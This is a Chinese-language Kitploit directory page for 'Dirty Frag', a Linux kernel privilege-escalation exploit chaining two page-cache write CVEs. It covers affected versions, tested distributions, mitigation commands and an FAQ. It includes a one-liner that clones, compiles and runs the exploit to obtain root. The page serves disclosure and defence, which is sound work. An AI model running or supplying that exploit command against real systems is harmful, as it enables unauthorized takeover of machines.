Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-43284 — 一个Linux内核权限提升漏洞利用程序,串联了两个页缓存写入漏洞(CVE-2026-43284, CVE-2026-43500),可在主流发行版上实现确定性的root访问。 | Kitploit
工具/GitHubGitHub/frosterdl/cve-2026-43284
权限提升漏洞分析漏洞利用学习与教育二进制利用
GitHubfrosterdl/cve-2026-43284

CVE-2026-43284

一个Linux内核权限提升漏洞利用程序,串联了两个页缓存写入漏洞(CVE-2026-43284, CVE-2026-43500),可在主流发行版上实现确定性的root访问。

查看仓库
13个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Dirty Frag:通用 Linux 本地提权漏洞

摘要

本文档介绍了由 Hyunwoo Kim (@v4bel) 发现并报告的 Dirty Frag 漏洞类。通过串联 xfrm-ESP Page-Cache Write (CVE-2026-43284) 与 RxRPC Page-Cache Write (CVE-2026-43500),攻击者可以在主流 Linux 发行版上提升至 root 权限。

Dirty Frag 属于与 Dirty Pipe 和 Copy Fail 相同的 bug 家族。它属于确定性的逻辑漏洞,不依赖时间窗口或竞争条件,失败时不会导致内核恐慌,且利用成功率极高。

完整的技术细节和披露时间线请参见随附的技术文章(不包含在本仓库中)。

  • xfrm-ESP Page-Cache Write (CVE-2026-43284) 已于主线提交 f4c50a4034e6 中修复。
  • RxRPC Page-Cache Write (CVE-2026-43500) 已于主线提交 aa54b1d27fe0 中修复。

[!NOTE] 本文档首次发布时(2026-05-07),禁运已从外部被打破。当时尚无公开补丁或 CVE。在与维护者通过 [email protected] 讨论后,Dirty Frag 的披露被公之于众。时间线详见技术文章。

利用

快速单行命令

root@kitploit:~
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

此 PoC 在与 linux-distros 协调后出于信息目的共享。请勿在未经授权的系统上运行。

清理

⚠️ 重要: 运行利用程序会污染页面缓存。要恢复干净状态,请执行以下任一操作:

root@kitploit:~
echo 3 > /proc/sys/vm/drop_caches

或重启机器。

受影响版本

  • CVE-2026-43284:xfrm-ESP 页面缓存写入漏洞从 cac2661c53f3 (2017-01-17) 到 f4c50a4034e6 (2026-05-05) 均存在。
  • CVE-2026-43500:RxRPC 页面缓存写入漏洞从 2dc334f1a63a (2023-06-08) 到 aa54b1d27fe0 (2026-05-10) 均存在。

实际上,这些漏洞跨越了大约九年。

已测试的发行版版本包括:

  • Ubuntu 24.04.4: 6.17.0-23-generic
  • RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
  • openSUSE Tumbleweed: 7.0.2-1-default
  • CentOS Stream 10: 6.12.0-224.el10.x86_64
  • AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
  • Fedora 44: 6.19.14-300.fc44.x86_64
  • ...

缓解措施

  1. 移除受影响模块并清除页面缓存,执行:
root@kitploit:~
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
  1. 应用发行版向后移植或供应商补丁,一旦可用。

常见问题

为什么要串联两个漏洞?

xfrm-ESP 页面缓存写入提供了类似于 Copy Fail 的强大约束 4 字节 STORE 原语,并且在许多发行版上可用,但需要特权才能创建命名空间。

Ubuntu 可能通过 AppArmor 限制非特权用户命名空间创建,从而阻止 xfrm-ESP 被触发。RxRPC 页面缓存写入不需要命名空间创建特权,但 rxrpc.ko 模块在多数发行版上默认不存在。而在 Ubuntu 上,rxrpc.ko 通常会加载。

串联两者弥补了各自的缺口,从而在所有主要发行版上实现 root 权限。详情见技术文章。

又是“品牌化”的“Dirty”系列?

是的——Dirty Frag 与“Dirty Pipe”相关,这个名字反映了该漏洞类修改了 struct sk_buff 的 frag 成员。

与“Copy Fail”的关系?

Copy Fail 启发了这项研究。Dirty Frag 链中的 xfrm-ESP 页面缓存写入与 Copy Fail 使用相同的 sink,但即使存在 algif_aead 缓解措施,它也能触发。因此,已针对 Copy Fail 加固的系统可能仍对 Dirty Frag 脆弱。

如何修复我的 Linux?

请遵循上面“缓解措施”部分的步骤。

联系方式

维护者:https://linkedin.com/in/tahamuhammadshafiq

下载工具